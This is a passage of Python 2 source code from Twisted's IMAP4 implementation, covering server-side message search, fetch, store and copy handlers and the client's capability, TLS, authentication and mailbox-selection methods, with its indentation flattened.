def search_SENTON(self, query, id, msg):
"""
Returns C{True} if the message date is the same as the query date.
@type query: A C{list} of C{str}
@param query: A list whose first element starts with a stringified date
that is a fragment of an L{imap4.Query()}. The date must be in the
format 'DD-Mon-YYYY', for example '03-March-2003' or '03-Mar-2003'.
@type msg: Provider of L{imap4.IMessage}
"""
date = msg.getHeaders(False, 'date').get('date', '')
date = rfc822.parsedate(date)
return date[:3] == parseTime(query.pop(0))[:3]
def search_SENTSINCE(self, query, id, msg):
"""
Returns C{True} if the message date is later than the query date.
@type query: A C{list} of C{str}
@param query: A list whose first element starts with a stringified date
that is a fragment of an L{imap4.Query()}. The date must be in the
format 'DD-Mon-YYYY', for example '03-March-2003' or '03-Mar-2003'.
@type msg: Provider of L{imap4.IMessage}
"""
date = msg.getHeaders(False, 'date').get('date', '')
date = rfc822.parsedate(date)
return date > parseTime(query.pop(0))
def search_SINCE(self, query, id, msg):
date = parseTime(query.pop(0))
return rfc822.parsedate(msg.getInternalDate()) > date
def search_SMALLER(self, query, id, msg):
return int(query.pop(0)) > msg.getSize()
def search_SUBJECT(self, query, id, msg):
subj = msg.getHeaders(False, 'subject').get('subject', '')
return subj.lower().find(query.pop(0).lower()) != -1
def search_TEXT(self, query, id, msg):
# XXX - This must search headers too
body = query.pop(0).lower()
return text.strFile(body, msg.getBodyFile(), False)
def search_TO(self, query, id, msg):
to = msg.getHeaders(False, 'to').get('to', '')
return to.lower().find(query.pop(0).lower()) != -1
def search_UID(self, query, id, msg, (lastSequenceId, lastMessageId)):
"""
Returns C{True} if the message UID is in the range defined by the
search query.
@type query: A C{list} of C{str}
@param query: A list representing the parsed form of the search
query. Its first element should be a C{str} that can be interpreted
as a sequence range, for example '2:4,5:*'.
@type id: C{int}
@param id: The sequence number of the message being checked.
@type msg: Provider of L{imap4.IMessage}
@param msg: The message being checked.
@type lastSequenceId: C{int}
@param lastSequenceId: The highest sequence number of a message in the
mailbox.
@type lastMessageId: C{int}
@param lastMessageId: The highest UID of a message in the mailbox.
"""
c = query.pop(0)
m = parseIdList(c, lastMessageId)
return msg.getUID() in m
def search_UNANSWERED(self, query, id, msg):
return '\\Answered' not in msg.getFlags()
def search_UNDELETED(self, query, id, msg):
return '\\Deleted' not in msg.getFlags()
def search_UNDRAFT(self, query, id, msg):
return '\\Draft' not in msg.getFlags()
def search_UNFLAGGED(self, query, id, msg):
return '\\Flagged' not in msg.getFlags()
def search_UNKEYWORD(self, query, id, msg):
query.pop(0)
return False
def search_UNSEEN(self, query, id, msg):
return '\\Seen' not in msg.getFlags()
def __ebSearch(self, failure, tag):
self.sendBadResponse(tag, 'SEARCH failed: ' + str(failure.value))
log.err(failure)
def do_FETCH(self, tag, messages, query, uid=0):
if query:
self._oldTimeout = self.setTimeout(None)
maybeDeferred(self.mbox.fetch, messages, uid=uid
).addCallback(iter
).addCallback(self.__cbFetch, tag, query, uid
).addErrback(self.__ebFetch, tag
)
else:
self.sendPositiveResponse(tag, 'FETCH complete')
select_FETCH = (do_FETCH, arg_seqset, arg_fetchatt)
def __cbFetch(self, results, tag, query, uid):
if self.blocked is None:
self.blocked = []
try:
id, msg = results.next()
except StopIteration:
# The idle timeout was suspended while we delivered results,
# restore it now.
self.setTimeout(self._oldTimeout)
del self._oldTimeout
# All results have been processed, deliver completion notification.
# It's important to run this *after* resetting the timeout to "rig
# a race" in some test code. writing to the transport will
# synchronously call test code, which synchronously loses the
# connection, calling our connectionLost method, which cancels the
# timeout. We want to make sure that timeout is cancelled *after*
# we reset it above, so that the final state is no timed
# calls. This avoids reactor uncleanliness errors in the test
# suite.
# XXX: Perhaps loopback should be fixed to not call the user code
# synchronously in transport.write?
self.sendPositiveResponse(tag, 'FETCH completed')
# Instance state is now consistent again (ie, it is as though
# the fetch command never ran), so allow any pending blocked
# commands to execute.
self._unblock()
else:
self.spewMessage(id, msg, query, uid
).addCallback(lambda _: self.__cbFetch(results, tag, query, uid)
).addErrback(self.__ebSpewMessage
)
def __ebSpewMessage(self, failure):
# This indicates a programming error.
# There's no reliable way to indicate anything to the client, since we
# may have already written an arbitrary amount of data in response to
# the command.
log.err(failure)
self.transport.loseConnection()
def spew_envelope(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('ENVELOPE ' + collapseNestedLists([getEnvelope(msg)]))
def spew_flags(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('FLAGS ' + '(%s)' % (' '.join(msg.getFlags())))
def spew_internaldate(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
idate = msg.getInternalDate()
ttup = rfc822.parsedate_tz(idate)
if ttup is None:
log.msg("%d:%r: unpareseable internaldate: %r" % (id, msg, idate))
raise IMAP4Exception("Internal failure generating INTERNALDATE")
odate = time.strftime("%d-%b-%Y %H:%M:%S ", ttup[:9])
if ttup[9] is None:
odate = odate + "+0000"
else:
if ttup[9] >= 0:
sign = "+"
else:
sign = "-"
odate = odate + sign + string.zfill(str(((abs(ttup[9]) / 3600) * 100 + (abs(ttup[9]) % 3600) / 60)), 4)
_w('INTERNALDATE ' + _quote(odate))
def spew_rfc822header(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
hdrs = _formatHeaders(msg.getHeaders(True))
_w('RFC822.HEADER ' + _literal(hdrs))
def spew_rfc822text(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('RFC822.TEXT ')
_f()
return FileProducer(msg.getBodyFile()
).beginProducing(self.transport
)
def spew_rfc822size(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('RFC822.SIZE ' + str(msg.getSize()))
def spew_rfc822(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('RFC822 ')
_f()
mf = IMessageFile(msg, None)
if mf is not None:
return FileProducer(mf.open()
).beginProducing(self.transport
)
return MessageProducer(msg, None, self._scheduler
).beginProducing(self.transport
)
def spew_uid(self, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
_w('UID ' + str(msg.getUID()))
def spew_bodystructure(self, id, msg, _w=None, _f=None):
_w('BODYSTRUCTURE ' + collapseNestedLists([getBodyStructure(msg, True)]))
def spew_body(self, part, id, msg, _w=None, _f=None):
if _w is None:
_w = self.transport.write
for p in part.part:
if msg.isMultipart():
msg = msg.getSubPart(p)
elif p > 0:
# Non-multipart messages have an implicit first part but no
# other parts - reject any request for any other part.
raise TypeError("Requested subpart of non-multipart message")
if part.header:
hdrs = msg.getHeaders(part.header.negate, *part.header.fields)
hdrs = _formatHeaders(hdrs)
_w(str(part) + ' ' + _literal(hdrs))
elif part.text:
_w(str(part) + ' ')
_f()
return FileProducer(msg.getBodyFile()
).beginProducing(self.transport
)
elif part.mime:
hdrs = _formatHeaders(msg.getHeaders(True))
_w(str(part) + ' ' + _literal(hdrs))
elif part.empty:
_w(str(part) + ' ')
_f()
if part.part:
return FileProducer(msg.getBodyFile()
).beginProducing(self.transport
)
else:
mf = IMessageFile(msg, None)
if mf is not None:
return FileProducer(mf.open()).beginProducing(self.transport)
return MessageProducer(msg, None, self._scheduler).beginProducing(self.transport)
else:
_w('BODY ' + collapseNestedLists([getBodyStructure(msg)]))
def spewMessage(self, id, msg, query, uid):
wbuf = WriteBuffer(self.transport)
write = wbuf.write
flush = wbuf.flush
def start():
write('* %d FETCH (' % (id,))
def finish():
write(')\r\n')
def space():
write(' ')
def spew():
seenUID = False
start()
for part in query:
if part.type == 'uid':
seenUID = True
if part.type == 'body':
yield self.spew_body(part, id, msg, write, flush)
else:
f = getattr(self, 'spew_' + part.type)
yield f(id, msg, write, flush)
if part is not query[-1]:
space()
if uid and not seenUID:
space()
yield self.spew_uid(id, msg, write, flush)
finish()
flush()
return self._scheduler(spew())
def __ebFetch(self, failure, tag):
self.setTimeout(self._oldTimeout)
del self._oldTimeout
log.err(failure)
self.sendBadResponse(tag, 'FETCH failed: ' + str(failure.value))
def do_STORE(self, tag, messages, mode, flags, uid=0):
mode = mode.upper()
silent = mode.endswith('SILENT')
if mode.startswith('+'):
mode = 1
elif mode.startswith('-'):
mode = -1
else:
mode = 0
maybeDeferred(self.mbox.store, messages, flags, mode, uid=uid).addCallbacks(
self.__cbStore, self.__ebStore, (tag, self.mbox, uid, silent), None, (tag,), None
)
select_STORE = (do_STORE, arg_seqset, arg_atom, arg_flaglist)
def __cbStore(self, result, tag, mbox, uid, silent):
if result and not silent:
for (k, v) in result.iteritems():
if uid:
uidstr = ' UID %d' % mbox.getUID(k)
else:
uidstr = ''
self.sendUntaggedResponse('%d FETCH (FLAGS (%s)%s)' %
(k, ' '.join(v), uidstr))
self.sendPositiveResponse(tag, 'STORE completed')
def __ebStore(self, failure, tag):
self.sendBadResponse(tag, 'Server error: ' + str(failure.value))
def do_COPY(self, tag, messages, mailbox, uid=0):
mailbox = self._parseMbox(mailbox)
maybeDeferred(self.account.select, mailbox
).addCallback(self._cbCopySelectedMailbox, tag, messages, mailbox, uid
).addErrback(self._ebCopySelectedMailbox, tag
)
select_COPY = (do_COPY, arg_seqset, arg_astring)
def _cbCopySelectedMailbox(self, mbox, tag, messages, mailbox, uid):
if not mbox:
self.sendNegativeResponse(tag, 'No such mailbox: ' + mailbox)
else:
maybeDeferred(self.mbox.fetch, messages, uid
).addCallback(self.__cbCopy, tag, mbox
).addCallback(self.__cbCopied, tag, mbox
).addErrback(self.__ebCopy, tag
)
def _ebCopySelectedMailbox(self, failure, tag):
self.sendBadResponse(tag, 'Server error: ' + str(failure.value))
def __cbCopy(self, messages, tag, mbox):
# XXX - This should handle failures with a rollback or something
addedDeferreds = []
addedIDs = []
failures = []
fastCopyMbox = IMessageCopier(mbox, None)
for (id, msg) in messages:
if fastCopyMbox is not None:
d = maybeDeferred(fastCopyMbox.copy, msg)
addedDeferreds.append(d)
continue
# XXX - The following should be an implementation of IMessageCopier.copy
# on an IMailbox->IMessageCopier adapter.
flags = msg.getFlags()
date = msg.getInternalDate()
body = IMessageFile(msg, None)
if body is not None:
bodyFile = body.open()
d = maybeDeferred(mbox.addMessage, bodyFile, flags, date)
else:
def rewind(f):
f.seek(0)
return f
buffer = tempfile.TemporaryFile()
d = MessageProducer(msg, buffer, self._scheduler
).beginProducing(None
).addCallback(lambda _, b=buffer, f=flags, d=date: mbox.addMessage(rewind(b), f, d)
)
addedDeferreds.append(d)
return defer.DeferredList(addedDeferreds)
def __cbCopied(self, deferredIds, tag, mbox):
ids = []
failures = []
for (status, result) in deferredIds:
if status:
ids.append(result)
else:
failures.append(result.value)
if failures:
self.sendNegativeResponse(tag, '[ALERT] Some messages were not copied')
else:
self.sendPositiveResponse(tag, 'COPY completed')
def __ebCopy(self, failure, tag):
self.sendBadResponse(tag, 'COPY failed:' + str(failure.value))
log.err(failure)
def do_UID(self, tag, command, line):
command = command.upper()
if command not in ('COPY', 'FETCH', 'STORE', 'SEARCH'):
raise IllegalClientResponse(command)
self.dispatchCommand(tag, command, line, uid=1)
select_UID = (do_UID, arg_atom, arg_line)
#
# IMailboxListener implementation
#
def modeChanged(self, writeable):
if writeable:
self.sendUntaggedResponse(message='[READ-WRITE]', async=True)
else:
self.sendUntaggedResponse(message='[READ-ONLY]', async=True)
def flagsChanged(self, newFlags):
for (mId, flags) in newFlags.iteritems():
msg = '%d FETCH (FLAGS (%s))' % (mId, ' '.join(flags))
self.sendUntaggedResponse(msg, async=True)
def newMessages(self, exists, recent):
if exists is not None:
self.sendUntaggedResponse('%d EXISTS' % exists, async=True)
if recent is not None:
self.sendUntaggedResponse('%d RECENT' % recent, async=True)
class UnhandledResponse(IMAP4Exception): pass
class NegativeResponse(IMAP4Exception): pass
class NoSupportedAuthentication(IMAP4Exception):
def __init__(self, serverSupports, clientSupports):
IMAP4Exception.__init__(self, 'No supported authentication schemes available')
self.serverSupports = serverSupports
self.clientSupports = clientSupports
def __str__(self):
return (IMAP4Exception.__str__(self)
+ ': Server supports %r, client supports %r'
% (self.serverSupports, self.clientSupports))
class IllegalServerResponse(IMAP4Exception): pass
TIMEOUT_ERROR = error.TimeoutError()
class IMAP4Client(basic.LineReceiver, policies.TimeoutMixin):
"""IMAP4 client protocol implementation
@ivar state: A string representing the state the connection is currently
in.
"""
implements(IMailboxListener)
tags = None
waiting = None
queued = None
tagID = 1
state = None
startedTLS = False
# Number of seconds to wait before timing out a connection.
# If the number is <= 0 no timeout checking will be performed.
timeout = 0
# Capabilities are not allowed to change during the session
# So cache the first response and use that for all later
# lookups
_capCache = None
_memoryFileLimit = 1024 * 1024 * 10
# Authentication is pluggable. This maps names to IClientAuthentication
# objects.
authenticators = None
STATUS_CODES = ('OK', 'NO', 'BAD', 'PREAUTH', 'BYE')
STATUS_TRANSFORMATIONS = {
'MESSAGES': int, 'RECENT': int, 'UNSEEN': int
}
context = None
def __init__(self, contextFactory = None):
self.tags = {}
self.queued = []
self.authenticators = {}
self.context = contextFactory
self._tag = None
self._parts = None
self._lastCmd = None
def registerAuthenticator(self, auth):
"""Register a new form of authentication
When invoking the authenticate() method of IMAP4Client, the first
matching authentication scheme found will be used. The ordering is
that in which the server lists support authentication schemes.
@type auth: Implementor of C{IClientAuthentication}
@param auth: The object to use to perform the client
side of this authentication scheme.
"""
self.authenticators[auth.getName().upper()] = auth
def rawDataReceived(self, data):
if self.timeout > 0:
self.resetTimeout()
self._pendingSize -= len(data)
if self._pendingSize > 0:
self._pendingBuffer.write(data)
else:
passon = ''
if self._pendingSize < 0:
data, passon = data[:self._pendingSize], data[self._pendingSize:]
self._pendingBuffer.write(data)
rest = self._pendingBuffer
self._pendingBuffer = None
self._pendingSize = None
rest.seek(0, 0)
self._parts.append(rest.read())
self.setLineMode(passon.lstrip('\r\n'))
# def sendLine(self, line):
# print 'S:', repr(line)
# return basic.LineReceiver.sendLine(self, line)
def _setupForLiteral(self, rest, octets):
self._pendingBuffer = self.messageFile(octets)
self._pendingSize = octets
if self._parts is None:
self._parts = [rest, '\r\n']
else:
self._parts.extend([rest, '\r\n'])
self.setRawMode()
def connectionMade(self):
if self.timeout > 0:
self.setTimeout(self.timeout)
def connectionLost(self, reason):
"""We are no longer connected"""
if self.timeout > 0:
self.setTimeout(None)
if self.queued is not None:
queued = self.queued
self.queued = None
for cmd in queued:
cmd.defer.errback(reason)
if self.tags is not None:
tags = self.tags
self.tags = None
for cmd in tags.itervalues():
if cmd is not None and cmd.defer is not None:
cmd.defer.errback(reason)
def lineReceived(self, line):
"""
Attempt to parse a single line from the server.
@type line: C{str}
@param line: The line from the server, without the line delimiter.
@raise IllegalServerResponse: If the line or some part of the line
does not represent an allowed message from the server at this time.
"""
# print 'C: ' + repr(line)
if self.timeout > 0:
self.resetTimeout()
lastPart = line.rfind('{')
if lastPart != -1:
lastPart = line[lastPart + 1:]
if lastPart.endswith('}'):
# It's a literal a-comin' in
try:
octets = int(lastPart[:-1])
except ValueError:
raise IllegalServerResponse(line)
if self._parts is None:
self._tag, parts = line.split(None, 1)
else:
parts = line
self._setupForLiteral(parts, octets)
return
if self._parts is None:
# It isn't a literal at all
self._regularDispatch(line)
else:
# If an expression is in progress, no tag is required here
# Since we didn't find a literal indicator, this expression
# is done.
self._parts.append(line)
tag, rest = self._tag, ''.join(self._parts)
self._tag = self._parts = None
self.dispatchCommand(tag, rest)
def timeoutConnection(self):
if self._lastCmd and self._lastCmd.defer is not None:
d, self._lastCmd.defer = self._lastCmd.defer, None
d.errback(TIMEOUT_ERROR)
if self.queued:
for cmd in self.queued:
if cmd.defer is not None:
d, cmd.defer = cmd.defer, d
d.errback(TIMEOUT_ERROR)
self.transport.loseConnection()
def _regularDispatch(self, line):
parts = line.split(None, 1)
if len(parts) != 2:
parts.append('')
tag, rest = parts
self.dispatchCommand(tag, rest)
def messageFile(self, octets):
"""Create a file to which an incoming message may be written.
@type octets: C{int}
@param octets: The number of octets which will be written to the file
@rtype: Any object which implements C{write(string)} and
C{seek(int, int)}
@return: A file-like object
"""
if octets > self._memoryFileLimit:
return tempfile.TemporaryFile()
else:
return StringIO.StringIO()
def makeTag(self):
tag = '%0.4X' % self.tagID
self.tagID += 1
return tag
def dispatchCommand(self, tag, rest):
if self.state is None:
f = self.response_UNAUTH
else:
f = getattr(self, 'response_' + self.state.upper(), None)
if f:
try:
f(tag, rest)
except:
log.err()
self.transport.loseConnection()
else:
log.err("Cannot dispatch: %s, %s, %s" % (self.state, tag, rest))
self.transport.loseConnection()
def response_UNAUTH(self, tag, rest):
if self.state is None:
# Server greeting, this is
status, rest = rest.split(None, 1)
if status.upper() == 'OK':
self.state = 'unauth'
elif status.upper() == 'PREAUTH':
self.state = 'auth'
else:
# XXX - This is rude.
self.transport.loseConnection()
raise IllegalServerResponse(tag + ' ' + rest)
b, e = rest.find('['), rest.find(']')
if b != -1 and e != -1:
self.serverGreeting(
self.__cbCapabilities(
([parseNestedParens(rest[b + 1:e])], None)))
else:
self.serverGreeting(None)
else:
self._defaultHandler(tag, rest)
def response_AUTH(self, tag, rest):
self._defaultHandler(tag, rest)
def _defaultHandler(self, tag, rest):
if tag == '*' or tag == '+':
if not self.waiting:
self._extraInfo([parseNestedParens(rest)])
else:
cmd = self.tags[self.waiting]
if tag == '+':
cmd.continuation(rest)
else:
cmd.lines.append(rest)
else:
try:
cmd = self.tags[tag]
except KeyError:
# XXX - This is rude.
self.transport.loseConnection()
raise IllegalServerResponse(tag + ' ' + rest)
else:
status, line = rest.split(None, 1)
if status == 'OK':
# Give them this last line, too
cmd.finish(rest, self._extraInfo)
else:
cmd.defer.errback(IMAP4Exception(line))
del self.tags[tag]
self.waiting = None
self._flushQueue()
def _flushQueue(self):
if self.queued:
cmd = self.queued.pop(0)
t = self.makeTag()
self.tags[t] = cmd
self.sendLine(cmd.format(t))
self.waiting = t
def _extraInfo(self, lines):
# XXX - This is terrible.
# XXX - Also, this should collapse temporally proximate calls into single
# invocations of IMailboxListener methods, where possible.
flags = {}
recent = exists = None
for response in lines:
elements = len(response)
if elements == 1 and response[0] == ['READ-ONLY']:
self.modeChanged(False)
elif elements == 1 and response[0] == ['READ-WRITE']:
self.modeChanged(True)
elif elements == 2 and response[1] == 'EXISTS':
exists = int(response[0])
elif elements == 2 and response[1] == 'RECENT':
recent = int(response[0])
elif elements == 3 and response[1] == 'FETCH':
mId = int(response[0])
values = self._parseFetchPairs(response[2])
flags.setdefault(mId, []).extend(values.get('FLAGS', ()))
else:
log.msg('Unhandled unsolicited response: %s' % (response,))
if flags:
self.flagsChanged(flags)
if recent is not None or exists is not None:
self.newMessages(exists, recent)
def sendCommand(self, cmd):
cmd.defer = defer.Deferred()
if self.waiting:
self.queued.append(cmd)
return cmd.defer
t = self.makeTag()
self.tags[t] = cmd
self.sendLine(cmd.format(t))
self.waiting = t
self._lastCmd = cmd
return cmd.defer
def getCapabilities(self, useCache=1):
"""Request the capabilities available on this server.
This command is allowed in any state of connection.
@type useCache: C{bool}
@param useCache: Specify whether to use the capability-cache or to
re-retrieve the capabilities from the server. Server capabilities
should never change, so for normal use, this flag should never be
false.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked with a
dictionary mapping capability types to lists of supported
mechanisms, or to None if a support list is not applicable.
"""
if useCache and self._capCache is not None:
return defer.succeed(self._capCache)
cmd = 'CAPABILITY'
resp = ('CAPABILITY',)
d = self.sendCommand(Command(cmd, wantResponse=resp))
d.addCallback(self.__cbCapabilities)
return d
def __cbCapabilities(self, (lines, tagline)):
caps = {}
for rest in lines:
for cap in rest[1:]:
parts = cap.split('=', 1)
if len(parts) == 1:
category, value = parts[0], None
else:
category, value = parts
caps.setdefault(category, []).append(value)
# Preserve a non-ideal API for backwards compatibility. It would
# probably be entirely sensible to have an object with a wider API than
# dict here so this could be presented less insanely.
for category in caps:
if caps[category] == [None]:
caps[category] = None
self._capCache = caps
return caps
def logout(self):
"""Inform the server that we are done with the connection.
This command is allowed in any state of connection.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked with None
when the proper server acknowledgement has been received.
"""
d = self.sendCommand(Command('LOGOUT', wantResponse=('BYE',)))
d.addCallback(self.__cbLogout)
return d
def __cbLogout(self, (lines, tagline)):
self.transport.loseConnection()
# We don't particularly care what the server said
return None
def noop(self):
"""Perform no operation.
This command is allowed in any state of connection.
@rtype: C{Deferred}
@return: A deferred whose callback will be invoked with a list
of untagged status updates the server responds with.
"""
d = self.sendCommand(Command('NOOP'))
d.addCallback(self.__cbNoop)
return d
def __cbNoop(self, (lines, tagline)):
# Conceivable, this is elidable.
# It is, afterall, a no-op.
return lines
def startTLS(self, contextFactory=None):
"""
Initiates a 'STARTTLS' request and negotiates the TLS / SSL
Handshake.
@param contextFactory: The TLS / SSL Context Factory to
leverage. If the contextFactory is None the IMAP4Client will
either use the current TLS / SSL Context Factory or attempt to
create a new one.
@type contextFactory: C{ssl.ClientContextFactory}
@return: A Deferred which fires when the transport has been
secured according to the given contextFactory, or which fails
if the transport cannot be secured.
"""
assert not self.startedTLS, "Client and Server are currently communicating via TLS"
if contextFactory is None:
contextFactory = self._getContextFactory()
if contextFactory is None:
return defer.fail(IMAP4Exception(
"IMAP4Client requires a TLS context to "
"initiate the STARTTLS handshake"))
if 'STARTTLS' not in self._capCache:
return defer.fail(IMAP4Exception(
"Server does not support secure communication "
"via TLS / SSL"))
tls = interfaces.ITLSTransport(self.transport, None)
if tls is None:
return defer.fail(IMAP4Exception(
"IMAP4Client transport does not implement "
"interfaces.ITLSTransport"))
d = self.sendCommand(Command('STARTTLS'))
d.addCallback(self._startedTLS, contextFactory)
d.addCallback(lambda _: self.getCapabilities())
return d
def authenticate(self, secret):
"""Attempt to enter the authenticated state with the server
This command is allowed in the Non-Authenticated state.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the authentication
succeeds and whose errback will be invoked otherwise.
"""
if self._capCache is None:
d = self.getCapabilities()
else:
d = defer.succeed(self._capCache)
d.addCallback(self.__cbAuthenticate, secret)
return d
def __cbAuthenticate(self, caps, secret):
auths = caps.get('AUTH', ())
for scheme in auths:
if scheme.upper() in self.authenticators:
cmd = Command('AUTHENTICATE', scheme, (),
self.__cbContinueAuth, scheme,
secret)
return self.sendCommand(cmd)
if self.startedTLS:
return defer.fail(NoSupportedAuthentication(
auths, self.authenticators.keys()))
else:
def ebStartTLS(err):
err.trap(IMAP4Exception)
# We couldn't negotiate TLS for some reason
return defer.fail(NoSupportedAuthentication(
auths, self.authenticators.keys()))
d = self.startTLS()
d.addErrback(ebStartTLS)
d.addCallback(lambda _: self.getCapabilities())
d.addCallback(self.__cbAuthTLS, secret)
return d
def __cbContinueAuth(self, rest, scheme, secret):
try:
chal = base64.decodestring(rest + '\n')
except binascii.Error:
self.sendLine('*')
raise IllegalServerResponse(rest)
self.transport.loseConnection()
else:
auth = self.authenticators[scheme]
chal = auth.challengeResponse(secret, chal)
self.sendLine(base64.encodestring(chal).strip())
def __cbAuthTLS(self, caps, secret):
auths = caps.get('AUTH', ())
for scheme in auths:
if scheme.upper() in self.authenticators:
cmd = Command('AUTHENTICATE', scheme, (),
self.__cbContinueAuth, scheme,
secret)
return self.sendCommand(cmd)
raise NoSupportedAuthentication(auths, self.authenticators.keys())
def login(self, username, password):
"""Authenticate with the server using a username and password
This command is allowed in the Non-Authenticated state. If the
server supports the STARTTLS capability and our transport supports
TLS, TLS is negotiated before the login command is issued.
A more secure way to log in is to use C{startTLS} or
C{authenticate} or both.
@type username: C{str}
@param username: The username to log in with
@type password: C{str}
@param password: The password to log in with
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if login is successful
and whose errback is invoked otherwise.
"""
d = maybeDeferred(self.getCapabilities)
d.addCallback(self.__cbLoginCaps, username, password)
return d
def serverGreeting(self, caps):
"""Called when the server has sent us a greeting.
@type caps: C{dict}
@param caps: Capabilities the server advertised in its greeting.
"""
def _getContextFactory(self):
if self.context is not None:
return self.context
try:
from twisted.internet import ssl
except ImportError:
return None
else:
context = ssl.ClientContextFactory()
context.method = ssl.SSL.TLSv1_METHOD
return context
def __cbLoginCaps(self, capabilities, username, password):
# If the server advertises STARTTLS, we might want to try to switch to TLS
tryTLS = 'STARTTLS' in capabilities
# If our transport supports switching to TLS, we might want to try to switch to TLS.
tlsableTransport = interfaces.ITLSTransport(self.transport, None) is not None
# If our transport is not already using TLS, we might want to try to switch to TLS.
nontlsTransport = interfaces.ISSLTransport(self.transport, None) is None
if not self.startedTLS and tryTLS and tlsableTransport and nontlsTransport:
d = self.startTLS()
d.addCallbacks(
self.__cbLoginTLS,
self.__ebLoginTLS,
callbackArgs=(username, password),
)
return d
else:
if nontlsTransport:
log.msg("Server has no TLS support. logging in over cleartext!")
args = ' '.join((_quote(username), _quote(password)))
return self.sendCommand(Command('LOGIN', args))
def _startedTLS(self, result, context):
self.transport.startTLS(context)
self._capCache = None
self.startedTLS = True
return result
def __cbLoginTLS(self, result, username, password):
args = ' '.join((_quote(username), _quote(password)))
return self.sendCommand(Command('LOGIN', args))
def __ebLoginTLS(self, failure):
log.err(failure)
return failure
def namespace(self):
"""Retrieve information about the namespaces available to this account
This command is allowed in the Authenticated and Selected states.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with namespace
information. An example of this information is::
[[['', '/']], [], []]
which indicates a single personal namespace called '' with '/'
as its hierarchical delimiter, and no shared or user namespaces.
"""
cmd = 'NAMESPACE'
resp = ('NAMESPACE',)
d = self.sendCommand(Command(cmd, wantResponse=resp))
d.addCallback(self.__cbNamespace)
return d
def __cbNamespace(self, (lines, last)):
for parts in lines:
if len(parts) == 4 and parts[0] == 'NAMESPACE':
return [e or [] for e in parts[1:]]
log.err("No NAMESPACE response to NAMESPACE command")
return [[], [], []]
def select(self, mailbox):
"""
Select a mailbox
This command is allowed in the Authenticated and Selected states.
@type mailbox: C{str}
@param mailbox: The name of the mailbox to select
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with mailbox
information if the select is successful and whose errback is
invoked otherwise. Mailbox information consists of a dictionary
with the following keys and values::
FLAGS: A list of strings containing the flags settable on
messages in this mailbox.
EXISTS: An integer indicating the number of messages in this
mailbox.
RECENT: An integer indicating the number of "recent"
messages in this mailbox.
UNSEEN: The message sequence number (an integer) of the
first unseen message in the mailbox.
PERMANENTFLAGS: A list of strings containing the flags that
can be permanently set on messages in this mailbox.
UIDVALIDITY: An integer uniquely identifying this mailbox.
"""
cmd = 'SELECT'
args = _prepareMailboxName(mailbox)
resp = ('FLAGS', 'EXISTS', 'RECENT', 'UNSEEN', 'PERMANENTFLAGS', 'UIDVALIDITY')
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbSelect, 1)
return d
def examine(self, mailbox):
"""Select a mailbox in read-only mode
This command is allowed in the Authenticated and Selected states.
@type mailbox: C{str}
@param mailbox: The name of the mailbox to examine
@rtype: C{Deferred}
@return: A deferred whose callback is invoked with mailbox
information if the examine is successful and whose errback
is invoked otherwise. Mailbox information consists of a dictionary
with the following keys and values::
'FLAGS': A list of strings containing the flags settable on
messages in this mailbox.
'EXISTS': An integer indicating the number of messages in this
mailbox.
'RECENT': An integer indicating the number of \"recent\"
messages in this mailbox.
'UNSEEN': An integer indicating the number of messages not
flagged \\Seen in this mailbox.
'PERMANENTFLAGS': A list of strings containing the flags that
can be permanently set on messages in this mailbox.
'UIDVALIDITY': An integer uniquely identifying this mailbox.
"""
cmd = 'EXAMINE'
args = _prepareMailboxName(mailbox)
resp = ('FLAGS', 'EXISTS', 'RECENT', 'UNSEEN', 'PERMANENTFLAGS', 'UIDVALIDITY')
d = self.sendCommand(Command(cmd, args, wantResponse=resp))
d.addCallback(self.__cbSelect, 0)
return d
def _intOrRaise(self, value, phrase):
"""
Parse C{value} as an integer and return the result or raise
L{IllegalServerResponse} with C{phrase} as an argument if C{value}
cannot be parsed as an integer.
"""
try:
return int(value)
except ValueError:
raise IllegalServerResponse(phrase)
def __cbSelect(self, (lines, tagline), rw):
"""
Handle lines received in response to a SELECT or EXAMINE command.
See RFC 3501, section 6.3.1.
"""
# In the absense of specification, we are free to assume:
# READ-WRITE access
datum = {'READ-WRITE': rw}
lines.append(parseNestedParens(tagline))
for split in lines:
if len(split) > 0 and split[0].upper() == 'OK':
# Handle all the kinds of OK response.
content = split[1]
key = content[0].upper()
if key == 'READ-ONLY':
datum['READ-WRITE'] = False
elif key == 'READ-WRITE':
datum['READ-WRITE'] = True
elif key == 'UIDVALIDITY':
datum['UIDVALIDITY'] = self._intOrRaise(
content[1], split)
elif key == 'UNSEEN':
datum['UNSEEN'] = self._intOrRaise(content[1], split)
elif key == 'UIDNEXT':
datum['UIDNEXT'] = self._intOrRaise(content[1], split)
elif key == 'PERMANENTFLAGS':
datum['PERMANENTFLAGS'] = tuple(content[1])
else:
log.err('Unhandled SELECT response (2): %s' % (split,))
elif len(split) == 2:
# Handle FLAGS, EXISTS, and RECENT
if split[0].upper() == 'FLAGS':
datum['FLAGS'] = tuple(split[1])
elif isinstance(split[1], str):
# Must make sure things are strings before treating them as
# strings since some other forms of response have nesting in
# places which results in lists instead.
if split[1].upper() == 'EXISTS':
datum['EXISTS'] = self._intOrRaise(split[0], split)
elif split[1].upper() == 'RECENT':
datum['RECENT'] = self._intOrRaise(split[0], split)
else:
log.err('Unhandled SELECT response (0): %s' % (split,))
else:
log.err('Unhandled SELECT response (1): %s' % (split,))
else:
log.err('Unhandled SELECT response (4): %s' % (split,))
return datum
def create(self, name):
"""Create a new mailbox on the server
This command is allowed in the Authenticated and Selected states.
@type name: C{str}
@param name: The name of the mailbox to create.
@rtype: C{Deferred}
@return: A deferred whose callback is invoked if the mailbox creation
is successful and whose errback is invoked otherwise.
"""
return self.sendCommand(Command('CREATE', _prepareMailboxName(name)))
def delete(self, name):
"""Delete a mailbox
